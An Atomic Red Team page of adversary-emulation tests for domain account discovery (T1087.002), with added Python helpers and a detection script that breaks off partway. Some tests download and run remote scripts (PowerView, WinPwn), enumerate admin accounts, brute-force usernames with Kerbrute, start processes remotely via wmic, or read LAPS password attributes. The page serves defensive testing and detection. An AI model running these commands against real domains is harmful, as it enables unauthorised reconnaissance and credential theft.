# T1087.002 - Domain Account

Adversaries may attempt to get a listing of domain accounts. This information can help adversaries determine which domain accounts exist to aid in follow-on behavior such as targeting specific accounts which possess particular privileges.

Commands such as `net user /domain` and `net group /domain` of the Net utility, `dscacheutil -q group` on macOS, and `ldapsearch` on Linux can list domain users and groups. PowerShell cmdlets including `Get-ADUser` and `Get-ADGroupMember` may enumerate members of Active Directory groups.
## Atomic Tests
### Atomic Test #1 - Enumerate all accounts (Domain)

Enumerate all accounts. Upon execution, multiple enumeration commands will be run and their output displayed in the console session.

**Supported Platforms:** windows

#### Attack Commands: Run with command_prompt

```cmd
net user /domain
net group /domain
```

Run with Invoke-Atomic:

```powershell
Invoke-AtomicTest T1087.002 -TestNumbers 1
```
### Atomic Test #2 - Enumerate all accounts via PowerShell (Domain)

Enumerate all accounts via PowerShell. Upon execution, user account and group information will be displayed. Note that `get-localgroupmember -group Users` reads the local Users group, which on a domain-joined host normally contains domain principals such as Domain Users, so it still surfaces domain accounts.

**Supported Platforms:** windows

#### Attack Commands: Run with powershell

```powershell
net user /domain
get-localgroupmember -group Users
get-aduser -filter *
```

Run with Invoke-Atomic:

```powershell
Invoke-AtomicTest T1087.002 -TestNumbers 2
```
### Atomic Test #3 - Enumerate logged on users via CMD (Domain)

Enumerate logged on users. Upon execution, the sessions on the local host and the users logged on to them will be displayed.

**Supported Platforms:** windows

#### Attack Commands: Run with command_prompt

```cmd
query user /SERVER:%COMPUTERNAME%
```

Run with Invoke-Atomic:

```powershell
Invoke-AtomicTest T1087.002 -TestNumbers 3
```
### Atomic Test #4 - Automated AD Recon (ADRecon)

ADRecon extracts and combines information about an AD environment into a report. Upon execution, an Excel file with all of the data will be generated and its path will be displayed.

**Supported Platforms:** windows

#### Dependencies: Run with powershell

##### Description: ADRecon must exist on disk at the specified location (PathToAtomicsFolder\..\ExternalPayloads\ADRecon.ps1)

##### Check Prereq Commands:

```powershell
if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\ADRecon.ps1") {exit 0} else {exit 1}
```

##### Get Prereq Commands:

```powershell
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest -Uri "https://raw.githubusercontent.com/sense-of-security/ADRecon/38e4abae3e26d0fa87281c1d0c65cabd4d3c6ebd/ADRecon.ps1" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\ADRecon.ps1"
```

Fetch prerequisites with Invoke-Atomic:

```powershell
Invoke-AtomicTest T1087.002 -TestNumbers 4 -GetPreReqs
```

#### Attack Commands: Run with powershell

```powershell
Invoke-Expression "PathToAtomicsFolder\..\ExternalPayloads\ADRecon.ps1"
```

Run with Invoke-Atomic:

```powershell
Invoke-AtomicTest T1087.002 -TestNumbers 4
```

#### Cleanup:

```powershell
Get-ChildItem "PathToAtomicsFolder\..\ExternalPayloads" -Recurse -Force | Where{$_.Name -Match "^ADRecon-Report-"} | Remove-Item -Force -Recurse
```

Run cleanup with Invoke-Atomic:

```powershell
Invoke-AtomicTest T1087.002 -TestNumbers 4 -Cleanup
```
### Atomic Test #5 - Adfind - Listing password policy

The AdFind tool can be used for reconnaissance in an Active Directory environment. This example uses AdFind to read the domain's password and lockout policy attributes (`-s base` against the default naming context). References: http://www.joeware.net/freetools/tools/adfind/, https://social.technet.microsoft.com/wiki/contents/articles/7535.adfind-command-examples.aspx

**Supported Platforms:** windows

#### Dependencies: Run with powershell

##### Description: AdFind.exe must exist on disk at the specified location (PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe)

##### Check Prereq Commands:

```powershell
if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe") {exit 0} else {exit 1}
```

##### Get Prereq Commands:

```powershell
New-Item -Type Directory (split-path "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe") -ErrorAction ignore | Out-Null
Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/bin/AdFind.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe"
```

Fetch prerequisites with Invoke-Atomic:

```powershell
Invoke-AtomicTest T1087.002 -TestNumbers 5 -GetPreReqs
```

#### Attack Commands: Run with command_prompt

```cmd
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -default -s base lockoutduration lockoutthreshold lockoutobservationwindow maxpwdage minpwdage minpwdlength pwdhistorylength pwdproperties
```

Run with Invoke-Atomic:

```powershell
Invoke-AtomicTest T1087.002 -TestNumbers 5
```
### Atomic Test #6 - Adfind - Enumerate Active Directory Admins

The AdFind tool can be used for reconnaissance in an Active Directory environment. This example has been documented in ransomware intrusions, where actors enumerated Active Directory admin accounts; the `admincountdmp` shortcut dumps objects with `adminCount=1`, i.e. accounts protected by AdminSDHolder. References: http://www.joeware.net/freetools/tools/adfind/, https://stealthbits.com/blog/fun-with-active-directorys-admincount-attribute/

**Supported Platforms:** windows

#### Dependencies: Run with powershell

##### Description: AdFind.exe must exist on disk at the specified location (PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe)

##### Check Prereq Commands:

```powershell
if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe") {exit 0} else {exit 1}
```

##### Get Prereq Commands:

```powershell
New-Item -Type Directory (split-path "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe") -ErrorAction ignore | Out-Null
Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/bin/AdFind.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe"
```

Fetch prerequisites with Invoke-Atomic:

```powershell
Invoke-AtomicTest T1087.002 -TestNumbers 6 -GetPreReqs
```

#### Attack Commands: Run with command_prompt

```cmd
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -sc admincountdmp
```

Run with Invoke-Atomic:

```powershell
Invoke-AtomicTest T1087.002 -TestNumbers 6
```
### Atomic Test #7 - Adfind - Enumerate Active Directory User Objects

The AdFind tool can be used for reconnaissance in an Active Directory environment. This example has been documented in ransomware intrusions, where actors enumerated Active Directory user objects. References: http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html

**Supported Platforms:** windows

#### Dependencies: Run with powershell

##### Description: AdFind.exe must exist on disk at the specified location (PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe)

##### Check Prereq Commands:

```powershell
if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe") {exit 0} else {exit 1}
```

##### Get Prereq Commands:

```powershell
New-Item -Type Directory (split-path "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe") -ErrorAction ignore | Out-Null
Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/bin/AdFind.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe"
```

Fetch prerequisites with Invoke-Atomic:

```powershell
Invoke-AtomicTest T1087.002 -TestNumbers 7 -GetPreReqs
```

#### Attack Commands: Run with command_prompt

```cmd
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -f (objectcategory=person)
```

Run with Invoke-Atomic:

```powershell
Invoke-AtomicTest T1087.002 -TestNumbers 7
```
### Atomic Test #8 - Adfind - Enumerate Active Directory Exchange AD Objects

The AdFind tool can be used for reconnaissance in an Active Directory environment. This example has been documented in ransomware intrusions, where actors enumerated Active Directory Exchange objects. References: http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html

**Supported Platforms:** windows

#### Dependencies: Run with powershell

##### Description: AdFind.exe must exist on disk at the specified location (PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe)

##### Check Prereq Commands:

```powershell
if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe") {exit 0} else {exit 1}
```

##### Get Prereq Commands:

```powershell
New-Item -Type Directory (split-path "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe") -ErrorAction ignore | Out-Null
Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/bin/AdFind.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe"
```

Fetch prerequisites with Invoke-Atomic:

```powershell
Invoke-AtomicTest T1087.002 -TestNumbers 8 -GetPreReqs
```

#### Attack Commands: Run with command_prompt

```cmd
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -sc exchaddresses
```

Run with Invoke-Atomic:

```powershell
Invoke-AtomicTest T1087.002 -TestNumbers 8
```
### Atomic Test #9 - Enumerate Default Domain Admin Details (Domain)

This test will enumerate the details of the built-in domain admin account.

**Supported Platforms:** windows

#### Attack Commands: Run with command_prompt

```cmd
net user administrator /domain
```

Run with Invoke-Atomic:

```powershell
Invoke-AtomicTest T1087.002 -TestNumbers 9
```
### Atomic Test #10 - Enumerate Active Directory for Unconstrained Delegation

Attackers may attempt to query for objects, typically computer accounts, with the userAccountControl flag TRUSTED_FOR_DELEGATION (0x80000; 524288) set. More information: https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html#when-the-stars-align-unconstrained-delegation-leads-to-rce. Prerequisite: the AD RSAT PowerShell module is needed and the test must run under a domain user.

**Supported Platforms:** windows

**Elevation Required** (e.g. root or admin)

#### Dependencies: Run with powershell

##### Description: PowerShell ActiveDirectory Module must be installed

##### Check Prereq Commands:

```powershell
Try {
    Import-Module ActiveDirectory -ErrorAction Stop | Out-Null
    exit 0
}
Catch {
    exit 1
}
```

##### Get Prereq Commands:

```powershell
if((Get-CimInstance -ClassName Win32_OperatingSystem).ProductType -eq 1) {
    Add-WindowsCapability -Name (Get-WindowsCapability -Name RSAT.ActiveDirectory.DS* -Online).Name -Online
} else {
    Install-WindowsFeature RSAT-AD-PowerShell
}
```

Fetch prerequisites with Invoke-Atomic:

```powershell
Invoke-AtomicTest T1087.002 -TestNumbers 10 -GetPreReqs
```

#### Attack Commands: Run with powershell

```powershell
Get-ADObject -LDAPFilter '(UserAccountControl:1.2.840.113556.1.4.803:=524288)' -Server $env:UserDnsDomain
```

Run with Invoke-Atomic:

```powershell
Invoke-AtomicTest T1087.002 -TestNumbers 10
```
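The filter above uses the LDAP_MATCHING_RULE_BIT_AND extensible match (OID 1.2.840.113556.1.4.803), which is true when every bit of the supplied mask is set in the attribute. Domain controllers carry TRUSTED_FOR_DELEGATION by design, so a hunt for misconfigured hosts normally also excludes SERVER_TRUST_ACCOUNT (0x2000). The Python below is an added example, not Atomic Red Team code: it decodes userAccountControl values, builds both forms of the filter, and evaluates them locally over a constructed set of sample objects (the account names and values are made up).

```python
"""Decode userAccountControl (UAC) bit flags and evaluate, locally, the bitwise-AND
LDAP filter Test #10 sends to the domain controller.

Added example for this page, not Atomic Red Team code. SAMPLE_OBJECTS is
constructed, not pulled from a real directory."""

# Well-known userAccountControl bits (subset).
UAC_FLAGS = {
    "ACCOUNTDISABLE": 0x0002,
    "NORMAL_ACCOUNT": 0x0200,
    "WORKSTATION_TRUST_ACCOUNT": 0x1000,
    "SERVER_TRUST_ACCOUNT": 0x2000,               # set on domain controllers
    "DONT_EXPIRE_PASSWORD": 0x10000,
    "TRUSTED_FOR_DELEGATION": 0x80000,            # unconstrained delegation
    "NOT_DELEGATED": 0x100000,
    "DONT_REQ_PREAUTH": 0x400000,
    "TRUSTED_TO_AUTH_FOR_DELEGATION": 0x1000000,  # constrained delegation with protocol transition
}

# Extensible-match rule: true when all bits in the mask are set in the attribute.
LDAP_MATCHING_RULE_BIT_AND = "1.2.840.113556.1.4.803"


def decode_uac(value: int) -> list:
    """Names of every known flag set in a UAC value, in UAC_FLAGS order."""
    return [name for name, bit in UAC_FLAGS.items() if value & bit]


def bit_and_filter(attribute: str, mask: int) -> str:
    """The '(attr:OID:=mask)' clause used in Test #10."""
    return f"({attribute}:{LDAP_MATCHING_RULE_BIT_AND}:={mask})"


def unconstrained_filter(exclude_dcs: bool = True) -> str:
    """Filter for unconstrained delegation. With exclude_dcs, also drop objects
    carrying SERVER_TRUST_ACCOUNT, since DCs are delegation-trusted by design."""
    clause = bit_and_filter("userAccountControl", UAC_FLAGS["TRUSTED_FOR_DELEGATION"])
    if not exclude_dcs:
        return clause
    dc_clause = bit_and_filter("userAccountControl", UAC_FLAGS["SERVER_TRUST_ACCOUNT"])
    return f"(&{clause}(!{dc_clause}))"


def matches_bit_and(uac: int, mask: int) -> bool:
    """Local evaluation of the BIT_AND rule."""
    return uac & mask == mask


def find_unconstrained(objects, exclude_dcs: bool = True) -> list:
    """sAMAccountNames whose UAC matches the unconstrained-delegation hunt."""
    hits = []
    for obj in objects:
        uac = obj["userAccountControl"]
        if not matches_bit_and(uac, UAC_FLAGS["TRUSTED_FOR_DELEGATION"]):
            continue
        if exclude_dcs and matches_bit_and(uac, UAC_FLAGS["SERVER_TRUST_ACCOUNT"]):
            continue
        hits.append(obj["sAMAccountName"])
    return hits


# Constructed sample objects; values chosen to exercise each branch.
SAMPLE_OBJECTS = [
    {"sAMAccountName": "DC01$",   "userAccountControl": 0x2000 | 0x80000},            # 532480: a DC
    {"sAMAccountName": "WEB01$",  "userAccountControl": 0x1000 | 0x80000},            # 528384: the finding
    {"sAMAccountName": "WS01$",   "userAccountControl": 0x1000},                      # 4096: plain workstation
    {"sAMAccountName": "svc_sql", "userAccountControl": 0x200 | 0x10000 | 0x80000},   # user account, unconstrained
    {"sAMAccountName": "svc_web", "userAccountControl": 0x200 | 0x1000000},           # constrained, not matched
]

if __name__ == "__main__":
    print(unconstrained_filter())
    for obj in SAMPLE_OBJECTS:
        print(obj["sAMAccountName"], decode_uac(obj["userAccountControl"]))
    print("unconstrained (excluding DCs):", find_unconstrained(SAMPLE_OBJECTS))
```

Note that user objects match as well as computers, which is why the test uses `Get-ADObject` rather than `Get-ADComputer`; `svc_sql` above shows that case.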
### Atomic Test #11 - Get-DomainUser with PowerView

Utilizing PowerView, run Get-DomainUser to identify the domain users. Upon execution, users within the domain will be listed.

**Supported Platforms:** windows

#### Attack Commands: Run with powershell

```powershell
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainUser -verbose
```

Run with Invoke-Atomic:

```powershell
Invoke-AtomicTest T1087.002 -TestNumbers 11
```
### Atomic Test #12 - Enumerate Active Directory Users with ADSISearcher

The following Atomic test will utilize ADSISearcher to enumerate users within Active Directory. Upon successful execution a listing of users will output with their paths in AD.

Reference: https://devblogs.microsoft.com/scripting/use-the-powershell-adsisearcher-type-accelerator-to-search-active-directory/

**Supported Platforms:** windows

**Elevation Required** (e.g. root or admin)

#### Attack Commands: Run with powershell

```powershell
([adsisearcher]"objectcategory=user").FindAll(); ([adsisearcher]"objectcategory=user").FindOne()
```

Run with Invoke-Atomic:

```powershell
Invoke-AtomicTest T1087.002 -TestNumbers 12
```
### Atomic Test #13 - Enumerate Linked Policies In ADSISearcher Discovery

The following Atomic test will utilize ADSISearcher to enumerate organizational units within Active Directory and, for each OU whose gPLink attribute is populated, resolve the linked Group Policy Objects. Upon successful execution the LDAP path of each such OU will output, followed by the path and display name of every linked policy.

Reference: https://medium.com/@pentesttas/discover-hidden-gpo-s-on-active-directory-using-ps-adsi-a284b6814c81

**Supported Platforms:** windows

**Elevation Required** (e.g. root or admin)

#### Attack Commands: Run with powershell

```powershell
(([adsisearcher]'(objectcategory=organizationalunit)').FindAll()).Path | %{if(([ADSI]"$_").gPlink){Write-Host "[+] OU Path:"([ADSI]"$_").Path;$a=((([ADSI]"$_").gplink) -replace "[[;]" -split "]");for($i=0;$i -lt $a.length;$i++){if($a[$i]){Write-Host "Policy Path[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).Path;Write-Host "Policy Name[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).DisplayName} };Write-Output "`n" }}
```

Run with Invoke-Atomic:

```powershell
Invoke-AtomicTest T1087.002 -TestNumbers 13
```
### Atomic Test #14 - Enumerate Root Domain linked policies Discovery

The following Atomic test will utilize ADSISearcher to enumerate the policies linked at the domain root within Active Directory. Upon successful execution the domain's LDAP path will output, followed by the path and display name of every policy linked at that level.

Reference: https://medium.com/@pentesttas/discover-hidden-gpo-s-on-active-directory-using-ps-adsi-a284b6814c81

**Supported Platforms:** windows

**Elevation Required** (e.g. root or admin)

#### Attack Commands: Run with powershell

```powershell
(([adsisearcher]'').SearchRoot).Path | %{if(([ADSI]"$_").gPlink){Write-Host "[+] Domain Path:"([ADSI]"$_").Path;$a=((([ADSI]"$_").gplink) -replace "[[;]" -split "]");for($i=0;$i -lt $a.length;$i++){if($a[$i]){Write-Host "Policy Path[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).Path;Write-Host "Policy Name[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).DisplayName} };Write-Output "`n" }}
```

Run with Invoke-Atomic:

```powershell
Invoke-AtomicTest T1087.002 -TestNumbers 14
```
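Tests #13 and #14 both walk the gPLink attribute, whose value is a sequence of `[LDAP path;options]` entries. The one-liners strip the `[`/`;` characters and then cut the last character of each entry, so they discard the options digit and cannot tell an enforced link (bit 2) from a disabled one (bit 1). The parser below is an added example, not Atomic Red Team or ADSI code; SAMPLE_GPLINK is constructed, and only the first GUID (the Default Domain Policy) is a real well-known value.

```python
"""Parse the gPLink attribute walked by Tests #13 and #14, keeping the link options.

Added example for this page, not Atomic Red Team code. SAMPLE_GPLINK is constructed;
only the Default Domain Policy GUID in it is a real, well-known value."""
import re

# One entry per linked GPO: [LDAP://CN={guid},CN=Policies,CN=System,DC=...;options]
GPLINK_RE = re.compile(r"\[(LDAP://[^;\]]+);(\d+)\]", re.IGNORECASE)

GPLINK_DISABLED = 0x1   # link exists but is not applied
GPLINK_ENFORCED = 0x2   # "Enforced" / "No Override"


def parse_gplink(gplink) -> list:
    """One record per link, in the order stored in the attribute, options decoded."""
    links = []
    for m in GPLINK_RE.finditer(gplink or ""):
        path, options = m.group(1), int(m.group(2))
        links.append({
            "path": path,
            "options": options,
            "disabled": bool(options & GPLINK_DISABLED),
            "enforced": bool(options & GPLINK_ENFORCED),
        })
    return links


def applied_links(gplink) -> list:
    """Paths of the links that actually apply (disabled links removed)."""
    return [link["path"] for link in parse_gplink(gplink) if not link["disabled"]]


def gpo_guid(path: str):
    """The policy GUID embedded in a GPO's LDAP path, upper-cased, or None."""
    m = re.search(r"CN=\{([0-9A-F-]{36})\}", path, re.IGNORECASE)
    return m.group(1).upper() if m else None


# Constructed sample: three links on one container with options 0, 2 and 1.
SAMPLE_GPLINK = (
    "[LDAP://CN={31B2F340-016D-11D2-945F-00C04FB984F9},CN=Policies,CN=System,DC=example,DC=test;0]"
    "[LDAP://CN={0A1B2C3D-1111-2222-3333-444455556666},CN=Policies,CN=System,DC=example,DC=test;2]"
    "[LDAP://CN={DEADBEEF-0000-0000-0000-000000000001},CN=Policies,CN=System,DC=example,DC=test;1]"
)

if __name__ == "__main__":
    for link in parse_gplink(SAMPLE_GPLINK):
        state = "enforced" if link["enforced"] else ("disabled" if link["disabled"] else "normal")
        print(gpo_guid(link["path"]), state)
    print("applied:", applied_links(SAMPLE_GPLINK))
```

Resolving each path's displayName, as the one-liners do with `[ADSI]`, needs a directory connection and is left out; the parser gives you the paths and the option bits to feed that lookup.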
### Atomic Test #15 - WinPwn - generaldomaininfo

Gathers general domain information using the generaldomaininfo function of WinPwn.

**Supported Platforms:** windows

#### Attack Commands: Run with powershell

```powershell
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
generaldomaininfo -noninteractive -consoleoutput
```

Run with Invoke-Atomic:

```powershell
Invoke-AtomicTest T1087.002 -TestNumbers 15
```
### Atomic Test #16 - Kerbrute - userenum

Enumerates Active Directory usernames using the userenum function of Kerbrute.

**Supported Platforms:** windows

#### Dependencies: Run with powershell

##### Description: kerbrute.exe must exist in PathToAtomicsFolder\..\ExternalPayloads.

##### Check Prereq Commands:

```powershell
if (test-path "PathToAtomicsFolder\..\ExternalPayloads\kerbrute.exe"){exit 0} else {exit 1}
```

##### Get Prereq Commands:

```powershell
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null
invoke-webrequest "https://github.com/ropnop/kerbrute/releases/download/v1.0.3/kerbrute_windows_386.exe" -outfile "PathToAtomicsFolder\..\ExternalPayloads\kerbrute.exe"
```

##### Description: username text file must exist in PathToAtomicsFolder\..\ExternalPayloads.

##### Check Prereq Commands:

```powershell
if (test-path "PathToAtomicsFolder\..\ExternalPayloads\username.txt"){exit 0} else {exit 1}
```

##### Get Prereq Commands:

```powershell
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null
invoke-webrequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/src/username.txt?raw=true" -outfile "PathToAtomicsFolder\..\ExternalPayloads\username.txt"
```

Fetch prerequisites with Invoke-Atomic:

```powershell
Invoke-AtomicTest T1087.002 -TestNumbers 16 -GetPreReqs
```

#### Attack Commands: Run with powershell

```powershell
cd "PathToAtomicsFolder\..\ExternalPayloads"
.\kerbrute.exe userenum -d $env:USERDOMAIN --dc $env:UserDnsDomain "PathToAtomicsFolder\..\ExternalPayloads\username.txt"
```

Run with Invoke-Atomic:

```powershell
Invoke-AtomicTest T1087.002 -TestNumbers 16
```
### Atomic Test #17 - Wevtutil - Discover NTLM Users Remote

This test discovers users who have authenticated against a Domain Controller via NTLM. This is done remotely via wmic, which starts wevtutil on the domain controller to export Security events with event code 4776 (NTLM credential validation) to C:\ntlmusers.evtx on that host; the cleanup step removes the file through the C$ share. Reference

**Supported Platforms:** windows

#### Attack Commands: Run with powershell

```powershell
$target = $env:LOGONSERVER
$target = $target.Trim("\\")
$IpAddress = [System.Net.Dns]::GetHostAddresses($target) | select IPAddressToString -ExpandProperty IPAddressToString
wmic.exe /node:$IpAddress process call create 'wevtutil epl Security C:\\ntlmusers.evtx /q:\"Event[System[(EventID=4776)]]"'
```

Run with Invoke-Atomic:

```powershell
Invoke-AtomicTest T1087.002 -TestNumbers 17
```

#### Cleanup:

```powershell
Remove-Item -Path \\$IpAddress\c$\ntlmusers.evtx
```

Run cleanup with Invoke-Atomic:

```powershell
Invoke-AtomicTest T1087.002 -TestNumbers 17 -Cleanup
```
### Atomic Test #18 - Suspicious LAPS Attributes Query with Get-ADComputer all properties

This test executes an LDAP query using the PowerShell command Get-ADComputer and lists all the properties, including the Microsoft LAPS attributes ms-Mcs-AdmPwd and ms-Mcs-AdmPwdExpirationTime. ms-Mcs-AdmPwd is a confidential attribute, so the cleartext value is only returned to principals granted read access on it; the query itself still stands out in telemetry.

**Supported Platforms:** windows

**Elevation Required** (e.g. root or admin)

#### Attack Commands: Run with powershell

```powershell
Get-ADComputer $env:computername -Properties *
```

Run with Invoke-Atomic:

```powershell
Invoke-AtomicTest T1087.002 -TestNumbers 18
```
### Atomic Test #19 - Suspicious LAPS Attributes Query with Get-ADComputer ms-Mcs-AdmPwd property

This test executes an LDAP query using the PowerShell command Get-ADComputer and lists the Microsoft LAPS attributes ms-Mcs-AdmPwd and ms-Mcs-AdmPwdExpirationTime.

**Supported Platforms:** windows

**Elevation Required** (e.g. root or admin)

#### Attack Commands: Run with powershell

```powershell
Get-ADComputer $env:computername -Properties ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime
```

Run with Invoke-Atomic:

```powershell
Invoke-AtomicTest T1087.002 -TestNumbers 19
```
### Atomic Test #20 - Suspicious LAPS Attributes Query with Get-ADComputer all properties and SearchScope

This test executes an LDAP query using the PowerShell command Get-ADComputer with SearchScope set to subtree and lists all the properties of every computer object, including the Microsoft LAPS attributes ms-Mcs-AdmPwd and ms-Mcs-AdmPwdExpirationTime.

**Supported Platforms:** windows

**Elevation Required** (e.g. root or admin)

#### Attack Commands: Run with powershell

```powershell
Get-adcomputer -SearchScope subtree -filter "name -like '*'" -Properties *
```

Run with Invoke-Atomic:

```powershell
Invoke-AtomicTest T1087.002 -TestNumbers 20
```
### Atomic Test #21 - Suspicious LAPS Attributes Query with adfind all properties

This test executes an LDAP query using the AdFind command and lists all the attributes of every computer object, including the Microsoft LAPS attributes ms-Mcs-AdmPwd and ms-Mcs-AdmPwdExpirationTime. It expects AdFind.exe at the same location used by Tests #5 to #8.

**Supported Platforms:** windows

**Elevation Required** (e.g. root or admin)

#### Attack Commands: Run with powershell

```powershell
& "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -h $env:USERDOMAIN -s subtree -f "objectclass=computer" *
```

Run with Invoke-Atomic:

```powershell
Invoke-AtomicTest T1087.002 -TestNumbers 21
```
### Atomic Test #22 - Suspicious LAPS Attributes Query with adfind ms-Mcs-AdmPwd

This test executes an LDAP query using the AdFind command and lists the Microsoft LAPS attributes ms-Mcs-AdmPwd and ms-Mcs-AdmPwdExpirationTime for every computer object. It expects AdFind.exe at the same location used by Tests #5 to #8.

**Supported Platforms:** windows

**Elevation Required** (e.g. root or admin)

#### Attack Commands: Run with powershell

```powershell
& "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -h $env:USERDOMAIN -s subtree -f "objectclass=computer" ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime
```

Run with Invoke-Atomic:

```powershell
Invoke-AtomicTest T1087.002 -TestNumbers 22
```
### Atomic Test #23 - Active Directory Domain Search

Output information from ldapsearch. The LDAP password is the admin-user password on Active Directory, although any valid domain user can perform this simple bind and enumerate the Users container. Passing the password with `-w` exposes it in shell history and process listings; `-W` prompts for it instead.

**Supported Platforms:** linux

**Elevation Required** (e.g. root or admin)

#### Dependencies: Run with sh

##### Description: Packages sssd-ad sssd-tools realmd adcli installed and realm available, ldapsearch

##### Check Prereq Commands:

```sh
which ldapsearch
```

##### Get Prereq Commands:

```sh
echo ldapsearch not found
```

Fetch prerequisites with Invoke-Atomic:

```powershell
Invoke-AtomicTest T1087.002 -TestNumbers 23 -GetPreReqs
```

#### Attack Commands: Run with sh

```sh
ldapsearch -H ldap://example.test:389 -x -D user@example.test -w s3CurePssw0rD! -b "CN=Users,DC=example,DC=test" -s sub -a always -z 1000 dn
```

Run with Invoke-Atomic:

```powershell
Invoke-AtomicTest T1087.002 -TestNumbers 23
```
### Atomic Test #24 - Account Enumeration with LDAPDomainDump

This test uses LDAPDomainDump to perform account enumeration on a domain. Reference

**Supported Platforms:** linux

**Elevation Required** (e.g. root or admin)

#### Dependencies: Run with sh

##### Description: Python3 must be installed

##### Check Prereq Commands:

```sh
if [ -x "$(command -v python3 --version)" ]; then exit 0; else exit 1; fi;
```

##### Get Prereq Commands:

```sh
sudo apt-get -y install python3
```

##### Description: Pip must be installed

##### Check Prereq Commands:

```sh
if [ -x "$(command -v pip --version)" ]; then exit 0; else exit 1; fi;
```

##### Get Prereq Commands:

```sh
wget -O /tmp/get-pip.py https://bootstrap.pypa.io/pip/3.6/get-pip.py
python3 /tmp/get-pip.py
```

##### Description: The ldapdomaindump module must be installed

##### Check Prereq Commands:

```sh
python3 -c 'import ldapdomaindump' 2>/dev/null
```

##### Get Prereq Commands:

```sh
pip install ldapdomaindump
```

##### Description: The future module must be installed

##### Check Prereq Commands:

```sh
python3 -c 'import future' 2>/dev/null
```

##### Get Prereq Commands:

```sh
pip install future
```

Fetch prerequisites with Invoke-Atomic:

```powershell
Invoke-AtomicTest T1087.002 -TestNumbers 24 -GetPreReqs
```

#### Attack Commands: Run with sh

The `domain\user` placeholder is single-quoted so the shell does not consume the backslash before ldapdomaindump sees it.

```sh
ldapdomaindump -u 'domain\user' -p password 127.0.0.1 -o /tmp/T1087
```

Run with Invoke-Atomic:

```powershell
Invoke-AtomicTest T1087.002 -TestNumbers 24
```

#### Cleanup:

```sh
rm -rf /tmp/T1087/ 2>/dev/null
```

Run cleanup with Invoke-Atomic:

```powershell
Invoke-AtomicTest T1087.002 -TestNumbers 24 -Cleanup
```
## Detection

System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.

Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell.
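As an added example (not part of the page or Atomic Red Team), the Python below applies command-line detection for the tests above to constructed process-creation events (fields modelled on Sysmon Event ID 1 / Security 4688; host names and paths are made up) and flags hosts where several distinct discovery behaviours cluster, which is the chain-of-behaviour view the paragraph above calls for. The rules match the exact command shapes this page documents; real deployments would widen them (obfuscated PowerShell, renamed binaries) and tune the threshold.

```python
"""Command-line detection for the domain-account discovery commands on this page,
run over constructed process-creation events.

Added example for this page, not Atomic Red Team code. The event dicts mimic the
fields of Sysmon Event ID 1 / Security 4688 (Computer, Image, CommandLine) but are
constructed here; host names and paths are made up."""
import re

# (rule name, regex on the image basename, regex on the command line)
RULES = [
    ("net_domain_enum", r"^net1?\.exe$",
     r"\b(user|group|localgroup)\b.*/domain\b"),
    ("adfind_recon", r"^adfind\.exe$",
     r"-sc\s+(admincountdmp|exchaddresses)|objectcategory=person|objectclass=computer"),
    ("laps_attribute_query", r"^(powershell|pwsh|adfind)\.exe$",
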